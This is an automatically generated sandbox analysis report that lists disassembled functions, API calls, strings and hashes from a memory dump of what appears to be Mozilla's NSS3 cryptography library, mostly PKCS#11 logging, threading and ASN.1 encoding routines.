API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: b07a667f65cba74504cc176067ffb11e73ef0e8b20651b8776dec0e386f9d9f5
Instruction ID: 242709df7ec547378702ed5583c528c4576b763ddc3d939cc904011c685f545f
Opcode Fuzzy Hash: b07a667f65cba74504cc176067ffb11e73ef0e8b20651b8776dec0e386f9d9f5
Instruction Fuzzy Hash: BD8109B1E022059BEF508F64EE85B9E77B5AF44318F144538EA1AE7B41E731E904C7E1

Function 6C7A6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C7A6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6DC3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C7A6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C7A6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C7A6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C7A6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C7A6EB9

Strings

C_Digest, xrefs: 6C7A6D81
pDigest = 0x%p, xrefs: 6C7A6E27
hSession = 0x%x, xrefs: 6C7A6D9E, 6C7A6DAE
pulDigestLen = 0x%p, xrefs: 6C7A6E42
ulDataLen = %d, xrefs: 6C7A6E0E
pData = 0x%p, xrefs: 6C7A6DF5
*pulDigestLen = 0x%x, xrefs: 6C7A6EB4
(CK_INVALID_HANDLE), xrefs: 6C7A6DBC

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 0a9e4bfae70bcf7576688a364846de853f0c7554f643a8b0347692bd420e4816
Instruction ID: 4b8b6d630c5735da1ae984678c3cb089b11eae055e7dfc3aab8727baa0e00550
Opcode Fuzzy Hash: 0a9e4bfae70bcf7576688a364846de853f0c7554f643a8b0347692bd420e4816
Instruction Fuzzy Hash: AB41E235602014ABDB209F98CE4DA9A7BB5AB8671CF048474E80897B12DB34BD09CBD1

Function 6C7A9C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6C7A9C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A9C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A9CA3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A9CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C7A9CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C7A9CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C7A9D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C7A9D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C7A9D42

Strings

hSession = 0x%x, xrefs: 6C7A9C7E, 6C7A9C8E
userType = 0x%x, xrefs: 6C7A9CD5
pUsername = 0x%p, xrefs: 6C7A9D24
ulUsernameLen = %d, xrefs: 6C7A9D3D
pPin = 0x%p, xrefs: 6C7A9CF0
C_LoginUser, xrefs: 6C7A9C61
ulPinLen = %d, xrefs: 6C7A9D0B
(CK_INVALID_HANDLE), xrefs: 6C7A9C9C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: b85f3b213e9102b3a84f032ffbc13bf4492cf256fd278b01dd7d07fb07b32f65
Instruction ID: 31793a4c6d581d745b8eac4ffb031aefd525a868922ffc293e802fc9a3f785bb
Opcode Fuzzy Hash: b85f3b213e9102b3a84f032ffbc13bf4492cf256fd278b01dd7d07fb07b32f65
Instruction Fuzzy Hash: 4D411731602044BBDB208F94DF4DE997BB1AB5631DF048475E8086BB12C735BC69CBD1

Function 6C761FE0 Relevance: 28.8, APIs: 19, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C762007
calloc.MOZGLUE(00000001,00000084), ref: 6C762077
calloc.MOZGLUE(00000001,0000002C), ref: 6C7620DF
TlsSetValue.KERNEL32(00000000), ref: 6C762188
PR_NewCondVar.NSS3 ref: 6C7621B7
calloc.MOZGLUE(00000001,00000084), ref: 6C76221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7622C2
GetLastError.KERNEL32 ref: 6C7622CD
free.MOZGLUE(00000000), ref: 6C7622DD

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID:
API String ID: 3559583721-0
Opcode ID: a8f15578d43429c37cd72cbdbfa55c510a4f0027000e542f9d1a4cc97be98d33
Instruction ID: c53985395b392709f24148fdc6297e91c53723ffe1c53f4a03684a3321cb64a4
Opcode Fuzzy Hash: a8f15578d43429c37cd72cbdbfa55c510a4f0027000e542f9d1a4cc97be98d33
Instruction Fuzzy Hash: C3917CB0A017019FDBA0AF39D90D75A7AF4BB0A708F00453AE85AD6E41DB74A909CF91

Function 6C889C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C889C70
PR_NewLock.NSS3 ref: 6C889C85

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_NewCondVar.NSS3(00000000), ref: 6C889C96

Part of subcall function 6C75BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C7621BC), ref: 6C75BB8C

PR_NewLock.NSS3 ref: 6C889CA9

Part of subcall function 6C8398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C839946
Part of subcall function 6C8398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F16B7,00000000), ref: 6C83994E
Part of subcall function 6C8398D0: free.MOZGLUE(00000000), ref: 6C83995E

PR_NewLock.NSS3 ref: 6C889CB9
PR_NewLock.NSS3 ref: 6C889CC9
PR_NewCondVar.NSS3(00000000), ref: 6C889CDA

Part of subcall function 6C75BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C75BBEB
Part of subcall function 6C75BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C75BBFB
Part of subcall function 6C75BB80: GetLastError.KERNEL32 ref: 6C75BC03
Part of subcall function 6C75BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C75BC19
Part of subcall function 6C75BB80: free.MOZGLUE(00000000), ref: 6C75BC22

PR_NewCondVar.NSS3(?), ref: 6C889CF0
PR_NewPollableEvent.NSS3 ref: 6C889D03

Part of subcall function 6C87F3B0: PR_CallOnce.NSS3(6C8D14B0,6C87F510), ref: 6C87F3E6
Part of subcall function 6C87F3B0: PR_CreateIOLayerStub.NSS3(6C8D006C), ref: 6C87F402
Part of subcall function 6C87F3B0: PR_Malloc.NSS3(00000004), ref: 6C87F416
Part of subcall function 6C87F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C87F42D
Part of subcall function 6C87F3B0: PR_SetSocketOption.NSS3(?), ref: 6C87F455
Part of subcall function 6C87F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C87F473

Part of subcall function 6C839890: TlsGetValue.KERNEL32(?,?,?,6C8397EB), ref: 6C83989E

EnterCriticalSection.KERNEL32(?), ref: 6C889D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C889DAF
_PR_CreateThread.NSS3(00000000,6C889EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C889D9F

Part of subcall function 6C75B3C0: TlsGetValue.KERNEL32 ref: 6C75B403
Part of subcall function 6C75B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C75B459

_PR_CreateThread.NSS3(00000000,6C88A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C889DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C889DFC
_PR_CreateThread.NSS3(00000000,6C88A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C889E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C889E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C889E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C889E89

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 15982114b46ecaabc1e52976ef7cafb89e97e10bcf14c0209729cb9abb6eb37c
Instruction ID: 1ce60823334e5780b2e6277bdd2944a62cd8a377cf75d319a06e154ffe6688a3
Opcode Fuzzy Hash: 15982114b46ecaabc1e52976ef7cafb89e97e10bcf14c0209729cb9abb6eb37c
Instruction Fuzzy Hash: 28612CB1901706AFD720DF79D944AA7BBE8FF48208B044939E859C7F51EB70E914CBA1

Function 6C783FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6C784014

Part of subcall function 6C7839F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C785E6F,?), ref: 6C783A08
Part of subcall function 6C7839F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C785E6F), ref: 6C783A1C
Part of subcall function 6C7839F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C783A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6C784038

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C78404D

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C89A0F4), ref: 6C7840C2

Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7CF0C8
Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7CF122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C78409A

Part of subcall function 6C7CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C77E708,00000000,00000000,00000004,00000000), ref: 6C7CBE6A
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C7CBE7E
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7840DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7840F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C784108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C78411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C784137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C784150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C89A1C8), ref: 6C78417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C784194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7841A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7841B2
PK11_DestroyObject.NSS3(?,?), ref: 6C7841D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7841FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C89A1A8), ref: 6C78422D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: 27e7661fe0e507eb178f4fe28a7dd0f138c2101b4c2cdca0e9c91bf827fe5090
Instruction ID: 6a2399de74b65c3ad46d28601291a294d3052e7da7e252d0d11b406e88748ad8
Opcode Fuzzy Hash: 27e7661fe0e507eb178f4fe28a7dd0f138c2101b4c2cdca0e9c91bf827fe5090
Instruction Fuzzy Hash: 535137B1F013016BF7109A2A9F59B6776DCDF5038CF044939EA5AC2F42FB71E404A2A2

Function 6C7C8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8E9E
PORT_ArenaAlloc_Util.NSS3(6C8D0B64,00000001,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C7C8E01), ref: 6C7C8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C8D0B64,6C8D0B64), ref: 6C7C8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C7C8F3F

Part of subcall function 6C7CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C7CA421,00000000,00000000,6C7C9826), ref: 6C7CA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7C904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C7C8E76

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: d0a68b3237fe275601ed312b001ca322e26939ea0db2aa6a69984eaa2fbd7d29
Instruction ID: 82b4ae10bf9c99f21efd98fc06fcf75ea4ec588cc5fd836be3b493d95f4a80cc
Opcode Fuzzy Hash: d0a68b3237fe275601ed312b001ca322e26939ea0db2aa6a69984eaa2fbd7d29
Instruction Fuzzy Hash: F161ACB5E0120AAFDB10CF55CE80AABB7B9EF94358F144538DC18A7B00E731E955CBA1

Function 6C778E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C778E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C778E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C778EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8A18D0,?), ref: 6C778F03
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C778F19
PL_FreeArenaPool.NSS3(?), ref: 6C778F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C778F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C778F65
PL_FinishArenaPool.NSS3(?), ref: 6C778FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C778FFE
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C779012
PL_FreeArenaPool.NSS3(?), ref: 6C779024
PL_FinishArenaPool.NSS3(?), ref: 6C77902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C77903E

Strings

security, xrefs: 6C778EE7

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 9d81ae068b6563fe48dc988b5cdde47f41d102abdb7d0b4f1259771fb5c9256f
Instruction ID: 6cb2bf503867ded2281200304f10dbf1a2b2bdd9883991ff76bca0b1bb71cb97
Opcode Fuzzy Hash: 9d81ae068b6563fe48dc988b5cdde47f41d102abdb7d0b4f1259771fb5c9256f
Instruction Fuzzy Hash: 89514A71608204ABDB305A58DF49FAB37A8AB8675CF45083EF455A7B40D771E908C7A3

Function 6C7A4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C7A4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4EC7

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C7A4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C7A4F68

Strings

ulCount = %d, xrefs: 6C7A4F63
hSession = 0x%x, xrefs: 6C7A4EA2, 6C7A4EB2
pTemplate = 0x%p, xrefs: 6C7A4F4A
C_GetAttributeValue, xrefs: 6C7A4E7E
hObject = 0x%x, xrefs: 6C7A4EF5, 6C7A4F05
(CK_INVALID_HANDLE), xrefs: 6C7A4EC0, 6C7A4F13

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: d11c6b2b8f779a869b5f8764835bcce03363dcfa2fd1b2be586aaf6653e6225e
Instruction ID: eb5d7e591c1abf3e4ff91e78d27b30943b75bb2dfa76bd84ccd9e7ab929c6c4f
Opcode Fuzzy Hash: d11c6b2b8f779a869b5f8764835bcce03363dcfa2fd1b2be586aaf6653e6225e
Instruction Fuzzy Hash: 5F41E335602104ABDB209F98DF4CF9A77B5EB4631DF089835E80857B12DB35BD0ADBA1

Function 6C7A4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C7A4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4D37

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C7A4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C7A4E20

Strings

hSession = 0x%x, xrefs: 6C7A4D12, 6C7A4D22
pulSize = 0x%p, xrefs: 6C7A4DB7
hObject = 0x%x, xrefs: 6C7A4D65, 6C7A4D75
C_GetObjectSize, xrefs: 6C7A4CEE
*pulSize = 0x%x, xrefs: 6C7A4E1B
(CK_INVALID_HANDLE), xrefs: 6C7A4D30, 6C7A4D83

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
